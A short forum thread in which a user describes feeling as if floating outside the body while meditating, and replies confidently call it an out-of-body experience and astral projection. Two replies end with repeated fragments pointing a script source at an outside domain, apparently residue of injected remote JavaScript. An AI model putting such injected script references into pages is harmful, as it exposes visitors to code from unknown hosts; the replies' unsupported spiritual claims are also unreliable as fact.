What Happened?

Okay, so one night, I was sitting cross-legged on my bed, and I was meditating deeply. But something odd happened. All of a sudden I felt kind of like I was floating, and I felt like I wasn't in my body, but I couldn't see anything, and my eyes were still closed. Then, I opened my eyes and went back to normal. Yeah you had an out of body experience I think you were in the midst off transcending but then you lost focus,I have not done it my self but this is just knowledge of what I know,hope this helps sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

You had an OBE or out of body experience. So yes you most likely slipped out of your body and into the astral plane. I suggest you try and fine tune your experience through trial and error. Have fun sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

If you indeed had an OoBE, you have gotten to the step that most people feel blocked from getting to when they first start projecting.
